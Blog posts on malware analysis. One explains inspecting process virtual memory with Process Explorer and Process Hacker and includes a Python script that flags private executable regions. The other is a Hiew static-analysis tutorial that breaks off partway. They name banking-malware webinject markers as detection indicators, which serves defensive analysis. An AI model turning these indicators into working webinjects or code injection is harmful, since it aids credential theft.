dream of a reverse engineer: a blog dedicated to reverse engineering, malware analysis and exploits, by abhijit mohanta (http://www.blogger.com/profile/07873328015433467380). Post: Virtual Memory Analysis: The overlooked part of Dynamic Analysis (2019-09-02)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
When we talk about dynamic analysis of malware in a Windows environment, we look at file modification, registry modification, network communication and process creation, but I feel people overlook the virtual memory of a process. Most experienced researchers probably use it, but an amateur researcher might miss it, as it is rarely mentioned in blogs or tutorials. Please do not confuse this with <b>memory forensics</b>.<br />
<br />
Before getting into details, I would recommend readers have some basic idea of virtual memory in Windows. I have explained some Windows internals concepts, including <a href="https://www.oreilly.com/library/view/preventing-ransomware/9781788620604/514934f9-9160-4f4c-a85e-a8f2663aeb26.xhtml">virtual memory</a>, in chapter 2 of my book <a href="https://www.oreilly.com/library/view/preventing-ransomware/9781788620604/">Preventing Ransomware</a>.<br />
<br />
To analyse virtual memory you can use<br />
1) <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer">Process Explorer</a> from Sysinternals<br />
2) <a href="https://processhacker.sourceforge.io/">Process Hacker</a><br />
<br />
While <b>Process Explorer</b> limits itself to displaying <b>strings of a specific area of memory (only the main module or main function)</b>, <b>Process Hacker</b> can show much more detail, such as <b>memory blocks</b>, the <b>permissions</b> of <b>memory blocks</b>, <a href="https://docs.microsoft.com/en-us/windows/win32/memory/page-state"><b>page states</b></a>, <b>modules</b> etc. Process Hacker also shows strings from the entire user-space virtual memory, unlike Process Explorer.<br />
<br />
To inspect memory strings in Process Explorer, double-click a process, go to the Strings tab and click the "Memory" radio button.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 556px; overflow: hidden; width: 462px;"><img height="556" src="https://lh3.googleusercontent.com/xMtW9q_upE--RP3J_R_UK5yZ_9eS78GvUOv1fG62fwBucYks8xEkqH58ADhvoREIT7X8y12_S-ZkmweG1nJOpGsdeF0-XvSo3s2MowLQCfyM5XTGd9C9QryKCJ4q0NhFojNWOpSD" style="margin-left: 0px; margin-top: 0px;" width="462" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
As I said, Process Explorer limits itself to strings. From strings you can derive a lot of information; we will see that shortly.<br />
<br />
To view memory with Process Hacker, double-click a process and go to the Memory tab.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 368px; overflow: hidden; width: 591px;"><img height="368" src="https://lh4.googleusercontent.com/gK8GulrFNHT3uCA2egAdloN4DHErbpZeZCOA6h327CIUYd1bpJRO_4XSt61h9nWVGi22LrQ6pG2hCQAa9gEKvhGdi5Lwas1HIj-CjhBIay039DAU_SuhGC6qJ8NUhTZHuEyZevYs" style="margin-left: 0px; margin-top: 0px;" width="591" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">The image displayed shows a page whose state is Commit and whose permission is RW (read/write). Don't think that these properties are of no use: they can be used to find <b>injected code</b>, <b>memory allocated by APIs like VirtualAlloc</b> etc. In this article I will focus on what we can derive from the strings available in memory.</span></span></div>
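<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">As an added example (not the author's tooling and not Process Hacker's code), the script below walks a process's virtual memory with VirtualQueryEx, the same information Process Hacker's Memory tab decodes into its State, Protection and Type columns, and flags the combination that points at injected or VirtualAlloc'd code: committed, private (not backed by an image on disk) and executable. The live walk needs Windows and a PID you may open; the classification helpers are platform independent. The verdict strings and the R/W/X rendering are my own choices.</div>

```python
"""Walk a process's virtual memory the way Process Hacker's Memory tab does and
flag regions whose state/protection/type combination deserves a closer look.
Added example for this post, not the author's or Process Hacker's code. The
VirtualQueryEx walk is Windows-only; the helpers run anywhere."""
import ctypes
import sys

# Constants from <winnt.h>; Process Hacker decodes the same values into its
# State / Protection / Type columns.
MEM_COMMIT, MEM_RESERVE, MEM_FREE = 0x1000, 0x2000, 0x10000
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE, PAGE_WRITECOPY = 0x01, 0x02, 0x04, 0x08
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY, PAGE_GUARD = 0x40, 0x80, 0x100
PROCESS_QUERY_INFORMATION, PROCESS_VM_READ = 0x0400, 0x0010
_EXEC = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
_WRITE = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY


class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    # Field order and alignment match the Win32 definition on x86 and x64.
    _fields_ = [("BaseAddress", ctypes.c_void_p), ("AllocationBase", ctypes.c_void_p),
                ("AllocationProtect", ctypes.c_uint32), ("RegionSize", ctypes.c_size_t),
                ("State", ctypes.c_uint32), ("Protect", ctypes.c_uint32),
                ("Type", ctypes.c_uint32)]


def protect_string(protect):
    """Render a PAGE_* value as R/W/X flags, e.g. PAGE_EXECUTE_READWRITE -> 'RWX'."""
    base = protect & 0xFF                       # drop modifiers such as PAGE_GUARD
    readable = base not in (0, PAGE_NOACCESS, PAGE_EXECUTE)
    flags = ("R" if readable else "-") + ("W" if base & _WRITE else "-") + ("X" if base & _EXEC else "-")
    return flags + ("+G" if protect & PAGE_GUARD else "")


def classify_region(state, protect, mem_type):
    """Triage rule (my own): executable memory that no module on disk accounts for."""
    if state != MEM_COMMIT:
        return "skip"                           # free/reserved: nothing to read
    if mem_type == MEM_PRIVATE and protect & _EXEC:
        return "suspicious: private executable memory (VirtualAlloc'd or injected code)"
    if mem_type == MEM_IMAGE and protect & _EXEC and protect & _WRITE:
        return "suspicious: writable code inside a loaded module (in-place patch or hook)"
    return "normal"


def summarize(mbi):
    """One MEMORY_BASIC_INFORMATION -> the row you would read in Process Hacker."""
    return {"base": mbi.BaseAddress or 0, "size": mbi.RegionSize,
            "state": {MEM_COMMIT: "Commit", MEM_RESERVE: "Reserve", MEM_FREE: "Free"}.get(mbi.State, "?"),
            "type": {MEM_PRIVATE: "Private", MEM_MAPPED: "Mapped", MEM_IMAGE: "Image"}.get(mbi.Type, "-"),
            "protect": protect_string(mbi.Protect),
            "verdict": classify_region(mbi.State, mbi.Protect, mbi.Type)}


def enumerate_regions(pid):
    """Walk the whole user-space range of `pid` with VirtualQueryEx (Windows only)."""
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.VirtualQueryEx.argtypes = [ctypes.c_void_p, ctypes.c_void_p,
                                   ctypes.POINTER(MEMORY_BASIC_INFORMATION), ctypes.c_size_t]
    k32.VirtualQueryEx.restype = ctypes.c_size_t
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    rows, address, mbi = [], 0, MEMORY_BASIC_INFORMATION()
    try:
        # VirtualQueryEx returns 0 once the address is past the user-space range.
        while k32.VirtualQueryEx(handle, address, ctypes.byref(mbi), ctypes.sizeof(mbi)):
            rows.append(summarize(mbi))
            address = (mbi.BaseAddress or 0) + mbi.RegionSize   # next region
    finally:
        k32.CloseHandle(handle)
    return rows


if __name__ == "__main__":
    if sys.platform != "win32" or len(sys.argv) != 2:
        sys.exit(f"usage (Windows only): {sys.argv[0]} <pid>")
    for row in enumerate_regions(int(sys.argv[1])):
        if row["verdict"] != "skip":
            print(f"{row['base']:#014x} {row['size']:#10x} {row['state']:7} "
                  f"{row['type']:7} {row['protect']:5} {row['verdict']}")
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">Run it as an administrator against the PID of the sample's process and read the "suspicious" rows first; a Private region marked RWX or R-X is where unpacked or injected code usually lives, and the Process Hacker Strings button on that same region is where the strings discussed below come from. Treat the verdict as a triage cue rather than a conviction: JIT runtimes such as .NET and browser engines legitimately create private executable memory.</div>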
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">You can view <b>strings</b> in Process Hacker by clicking the <b>Strings</b> button shown in the image above.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 352px; overflow: hidden; width: 624px;"><img height="352" src="https://lh3.googleusercontent.com/HTCkh-_58gaPHKMTT23azpOpeJSCuNnJcPDom93EZq2zeQamZlxmiXXauPEHBAP8X2lNNmUF-Vl3we3AnLP1YjCwZuCD1WhuBApc7aao32CdwSRtLlktvv2cTEm_CHaOMxgk-I_O" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">You can see many more strings in <b>Process Hacker</b> than in <b>Process Explorer</b>, including the addresses of the strings. You can use this data while reverse engineering too. If you are analyzing strings with Process Hacker you also need to work out which areas of memory to omit, what to look into and some further filtering; otherwise you will get millions of strings to analyse. I am keeping the string filtering material restricted to my training.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Here are some things you can derive by looking at the strings in memory:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">1) Was the malware file packed or not?</span></span></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">You can compare the strings in the file with those in virtual memory. If you find useful strings in memory that are not in the file, the malware file is packed and unpacks itself in memory. You need a bit of practice to tell whether strings are important or not. I have mentioned some important strings in the following points, but there are many more.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><b>2) Was the malware armored or not?</b></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Malware often does not execute completely if it detects a virtual machine or a security tool, or for other reasons, but you can still see relevant data.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Example:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 354px; overflow: hidden; width: 570px;"><img height="354" src="https://lh5.googleusercontent.com/nxvUTJlOzBCkV6eu6n3sB2RBAnmHefVVcoP3SzJf_XLQlz2csBXwMDTEpaURalY0WRfcbDLcdji4L2ZXTW_PvrBr1FigoPTHqjSakTwFidALVqrneICyS3c5P62MttgnwVewMiOS" style="margin-left: 0px; margin-top: 0px;" width="570" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
This screenshot shows strings from the memory of a malware sample which did not execute completely, as it seems to be looking for the presence of virtual machines. At the same time I found other strings, like a Run entry and URL patterns, which helped me conclude that it is malware even though <b>nothing conclusive</b> was visible in <b>dynamic analysis</b> other than a process being created.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b>3) Command and control patterns, URLs etc.</b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 36px; overflow: hidden; width: 624px;"><img height="36" src="https://lh4.googleusercontent.com/PYJ8Wrk2sZ0OjZht0JYnwqeo6dVwuM9-jEy_b8mrk0i4prnorKBqYW8BJK2X7oIW5mx-9fd04GfCFQ4fkX9stQu8Iyd8iGbQecTSktIOI86PslfBpy0gDAsb9P4dWlS6Olfaje9M" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Even though the malware did not execute for me, I could see the following pattern. This pattern is likely used by the malware to send the victim's system information to the attacker's server.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><b>4) Malware classification and naming</b></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Sometimes you can see strings like malware names or author names. You can google certain patterns and find that similar malware has been analysed in some blog or sandbox.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Here is one of my blogs on <a href="https://forums.juniper.net/t5/Threat-Research/Kronos-The-Banking-Chronicle/ba-p/358143">Kronos Ransomware</a>. If you see strings like "<b>data_before, data_after, data_inject, data_end</b>", it is more likely to be a banking malware.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">It is important to mention that you often may not get an opportunity to view strings, as the malware process might terminate quickly or memory pages may be overwritten, but there is always a workaround for such problems. You can try my</span><a href="https://github.com/amohanta/process_stopper/blob/master/process_stopper.sys" style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> process stopper</a><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> tool, even though it is not perfect. Other techniques include using debuggers efficiently.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">You can do a lot more by analyzing memory. I stress memory analysis a lot in my training </span></span><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">"</span><a href="http://www.rednetcybersecurity.com/elementor-2455/" style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Malware Analysis made Easy Training</a><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">" (the site is still under construction). Sometimes these techniques can eliminate the need to go through a complex reverse engineering process.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<br />
<br /></div>
Static Analysis with Hiew (2019-08-07)<div dir="ltr" style="text-align: left;" trbidi="on">
In my previous <a href="https://dreamofareverseengineer.blogspot.com/2019/07/using-far-manager-and-hiew-duo-in.html">post</a>, I talked about using Far Manager to speed up malware analysis work. I also talked about integrating Hiew (Hacker's View) into Far Manager.<br />
With the arrival of new tools like IDA Pro, Hiew is being forgotten, but it is still worth looking into. It is a lightweight tool with a <b>hex editor</b>, <b>PE (Portable Executable) parser</b>, <b>x86 disassembler</b>, <b>string viewer</b> and some other notable features which can help antivirus researchers do quick static analysis on a suspect file. I have been using it for years for writing AV signatures.<br />
<br />
If you open a file in Hiew, it shows the content of the file in Hiew's <b>text mode</b>. This mode is the same as opening the file in Notepad.<br />
<div dir="ltr" id="docs-internal-guid-13bb06f4-7fff-178b-3d8b-a775e534305a" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 314px; overflow: hidden; width: 621px;"><img height="314" src="https://lh3.googleusercontent.com/hh6ASe3iOVWEEUtZAhmlTUkxuncMi9JrMH9zu3sjAHq5srMila97Dl2F6srI9-ewY60wYIFbxKd597YSUmbr8My6OuvP8Tv9lVsgql8DOTbXAeXbtVPWDOSkpzjoLFdT_Vq54Y6j" style="margin-left: 0px; margin-top: 0px;" width="621" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">To see what you can do with Hiew, look at the pane at the bottom.</span></span></div>
<div dir="ltr" id="docs-internal-guid-0d5c993f-7fff-c929-46fb-180da7c70b0c" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 299px; overflow: hidden; width: 624px;"><img height="299" src="https://lh5.googleusercontent.com/KiecjJLP6_xIqBzlJedckuKt-jtsDkUS4Rhsf_OhJzX6G0_yrVZE4q26r8Qe-8lLjuAAey4hq4A6SVVtd5ytCfSuvR9Llpq5iQYQecvWEE7b_Xzvwxop6s19X1SoGNHqnIgLW2rk" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F1 is for help</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F5 can be used to go to a particular offset in the file</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F7 for searching a string.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">To change mode you can use F4.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Hiew has two other modes besides text: Hex and Decode. You can switch modes by pressing</span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> F4</b><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">, then select the mode using the </span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">arrow keys</b><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> and press </span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Enter</b><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">.</span></div>
<div dir="ltr" id="docs-internal-guid-596700c9-7fff-2dd4-85d5-daa0dcef224c" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 275px; overflow: hidden; width: 423px;"><img height="275" src="https://lh4.googleusercontent.com/E_rHpFt1JVpuufK8qMV9ceTWh9j4YHikDl79UJ7ktxQW4p4DpygWSyDehO81a5lmbo3FDWL2T4y3MHSSta1bNym0kytPg_LMpQ6MalKAm5KkSq2j35Ix9H2PXqxcTvDBciWx051V" style="margin-left: 0px; margin-top: 0px;" width="423" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Hiew has a hex editor embedded in it. If you want to see the equivalent hex bytes you need to change the </span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">mode to hex</b><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">: press F4, use the arrow keys to go to Hex and press Enter. The third mode is Decode, which disassembles the bytes. You can also press </span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">Enter</b><span style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;"> to switch between modes.</span></div>
<div>
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 184px; overflow: hidden; width: 624px;"><img height="184" src="https://lh3.googleusercontent.com/OMXrvHwExQhOSeBiVFx9UC2KVbuGZfoDwejVQ_wCOmU09mKc6SdWVLEx-FoKmf8xB-usimky8pgCzU8qeeXFP-4pEsGurlw3xedN3FcoYliWbf9GJP1pShL7zy_mqojcqrUMa-HD" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">The first column is the <b>file offset</b> (for PE files this shows the <b>virtual address</b> by default; press <b>Alt+F1</b> to see <b>file offsets</b>). The middle column is the hex bytes. The third is text.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">To see the strings in a file in any mode, press <b>Alt+F6</b>. This eliminates the need for another string viewer tool like <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/strings">strings</a> from Sysinternals.</span></span></div>
<div dir="ltr" id="docs-internal-guid-2386f115-7fff-fefd-f7f7-3cc28b4f3998" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 361px; overflow: hidden; width: 512px;"><img height="361" src="https://lh6.googleusercontent.com/SojG3VwxNgYeIsOr5U_rn2ZW8oCni7dG-M6yWgI7xOerMsFPy8Cxet6cN7HCA77xAcGT-8ggy4opDL0vnzNeCYu95uiCyncueFJceZm6DTOS1Tx-2NavC3z4AcFsnZj_0X1enfvn" style="margin-left: 0px; margin-top: 0px;" width="512" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">The blue strings are <b>ASCII</b> while the red ones are <b>Unicode</b>. To see the offset of a string in the file, move the cursor to the string and press Enter.</span></span></div>
<div dir="ltr" id="docs-internal-guid-8a1ad6e7-7fff-786b-edaa-cf24804c71e8" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 232px; overflow: hidden; width: 624px;"><img height="232" src="https://lh6.googleusercontent.com/-WHvOTNKQ4yZVMpjo4FAJUftEuTSg-2Kz7m9puOfL1dhNINbS75PXIhMtYRzW5KrV-3fesM_66yXnEInDxi1deorUiTQrh6IDtHiapgq3F4BwCVCVbLMSPtBLiix80Rm3MBv2mWq" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
You can see that at offset 0x00334DF0 the string "October " is present.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Let's look into the PE parser of Hiew. Open a 32-bit Windows executable in hex mode. By default the virtual address is shown instead of file offsets.</div>
<div dir="ltr" id="docs-internal-guid-9998e681-7fff-bf01-b0cc-58248045a150" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 267px; overflow: hidden; width: 624px;"><img height="267" src="https://lh6.googleusercontent.com/geyfrUhJS9QmN6TUywtWP7WJeEAjKhw9SMqYQguDLKjH9qKd739KJdUJJivZgCbXBD_ivHo6YgAjGuY3qUKBazwVCci0MXJ13yWpT2-6h8mlCcaVUZSHVWePXFHJWVtX1CqOxm1w" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
